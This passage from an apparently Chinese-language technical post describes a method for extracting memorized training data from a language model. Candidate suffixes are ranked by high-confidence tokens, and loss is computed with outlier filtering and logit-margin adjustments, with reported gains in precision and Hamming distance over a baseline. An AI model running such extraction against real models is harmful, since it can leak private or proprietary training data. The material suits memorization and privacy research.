方法）。这种方法的核心思想是奖励那些在生成后缀中包含高置信度 token 的候选后缀。具体来说，如果一个生成的后缀中的某个 token 具有高于特定阈值（例如 0.9）的概率，那么这个后缀在排名时会被赋予更高的分数。这种策略的目的是利用语言模型对其预测的置信度来提高提取任务的性能。对应的代码如下这段代码的功能是生成给定提示的输出序列，并计算每个生成序列的损失。输入参数 prompts: 包含提示序列的numpy数组。 batch_size: 每个批次处理的提示数量。默认为32。输出生成的序列数组 (generations) 和对应的损失数组 (losses)。主要步骤初始化: generations 和 losses 初始化为空列表。 generation_len 计算生成序列的长度，为后缀和前缀长度之和。将输入的 batch_size 设置为32，这个值在后续循环中使用。循环处理提示序列: 根据设定的批次大小，循环处理提示序列。每次循环中，提取并准备输入的提示批次 (prompt_batch)，并将其转换为PyTorch张量 (input_ids)。生成序列: 使用带有截断的方法生成序列，通过调用 _MODEL.generate 函数获取生成的标记 (generated_tokens)。在生成的标记上禁用梯度计算，并通过计算模型输出 (outputs.logits) 获得每个标记的logits值。损失计算: 计算每个标记的损失 (loss_per_token)，使用交叉熵损失函数 (torch.nn.functional.cross_entropy)。对损失进行后处理：使用标准差过滤异常值，如果损失超出3倍标准差范围，则设置为1。根据前两个最高的logits分数之间的差异和是否大于0.5来调整损失值。最后，计算每个生成序列的平均损失 (likelihood)。结果整理: 将生成的序列 (generated_tokens) 和损失 (likelihood) 添加到 generations 和 losses 列表中。返回结果: 将 generations 和 losses 转换为至少二维的numpy数组，并返回。执行后如下所示在上图中，也是用我们之前说的方法，看指标，precision,hamming dist等都相比基线方法有了较大提升。也就表明我们在本文中所说的这些策略都是有效的。

第2页第3页第4页第5页第6页第7页第8页第9页第10页第11页第12页第13页第14页第15页第16页第17页第18页第19页第20页第21页第22页第23页第24页第25页第26页第27页第28页第29页第30页第31页第32页第33页第34页第35页第36页第37页第38页第39页第40页第41页第42页第43页第44页第45页第46页第47页第48页第49页第50页第51页第52页第53页第54页第55页第56页第57页第58页第59页第60页第61页